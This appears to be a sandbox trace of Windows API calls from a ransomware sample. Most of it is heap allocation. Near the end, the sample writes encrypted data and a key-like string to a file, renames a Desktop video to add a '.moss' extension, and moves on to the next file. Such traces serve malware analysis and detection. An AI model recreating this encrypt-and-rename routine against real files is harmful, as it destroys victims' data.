SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.041] SetLastError (dwErrCode=0x0) [0169.041] GetLastError () returned 0x0 [0169.041] SetLastError (dwErrCode=0x0) [0169.041] GetLastError () returned 0x0 [0169.041] SetLastError (dwErrCode=0x0) [0169.042] GetLastError () returned 0x0 [0169.042] SetLastError (dwErrCode=0x0) [0169.042] GetLastError () returned 0x0 [0169.042] SetLastError (dwErrCode=0x0) [0169.042] GetLastError () returned 0x0 [0169.042] SetLastError (dwErrCode=0x0) [0169.042] GetLastError () returned 0x0 [0169.042] SetLastError (dwErrCode=0x0) [0169.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.042] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.042] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.042] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.042] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.043] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x165d0) returned 0x3b48820 [0169.044] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613670 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45038 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc30 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45080 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc48 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc78 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcd8 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0169.044] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b5edf8 [0169.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc78 | out: hHeap=0xcd0000) returned 1 [0169.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcd8 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5edf8 | out: hHeap=0xcd0000) returned 1 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbcd8 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbc78 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcd8 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc78 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613670 | out: hHeap=0xcd0000) returned 1 [0169.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.046] GetCurrentThreadId () returned 0x324 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31820 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.046] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.046] GetCurrentThreadId () returned 0x324 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.046] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.046] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.046] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.046] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.046] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.046] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc78 [0169.047] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.047] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbcd8 [0169.047] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.047] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc60 [0169.047] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.047] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.047] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbcf0 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc78 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc78 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc78 | out: hHeap=0xcd0000) returned 1 [0169.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b5edf8 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5edf8 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcf0 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcd8 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc60 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc48 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45080 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.050] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x165c6, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb14*=0x165c6, lpOverlapped=0x0) returned 1 [0169.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.051] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x165cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.051] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0169.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0169.052] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.052] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.052] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.052] CloseHandle (hObject=0x664) returned 1 [0169.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.055] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5DnktQKC1zi5mnZO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5dnktqkc1zi5mnzo.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5DnktQKC1zi5mnZO.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5dnktqkc1zi5mnzo.mkv.moss")) returned 1 [0169.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.056] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.058] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe477ab20, ftLastAccessTime.dwHighDateTime=0x1d5e359, ftLastWriteTime.dwLowDateTime=0xe477ab20, ftLastWriteTime.dwHighDateTime=0x1d5e359, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5RddQRlUxLC956", cAlternateFileName="5RDDQR~1")) returned 1 [0169.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a20 [0169.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0169.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b412b8 [0169.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41250 [0169.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b411e8 | out: hHeap=0xcd0000) returned 1 [0169.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0169.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2a20 | out: hHeap=0xcd0000) returned 1 [0169.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0169.058] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2bfa880, ftCreationTime.dwHighDateTime=0x1d5d88a, ftLastAccessTime.dwLowDateTime=0x764b5670, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0x764b5670, ftLastWriteTime.dwHighDateTime=0x1d5de26, nFileSizeHigh=0x0, nFileSizeLow=0x11e39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9WEgK.mp3", cAlternateFileName="")) returned 1 [0169.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9WEgK.mp3") returned=".mp3" 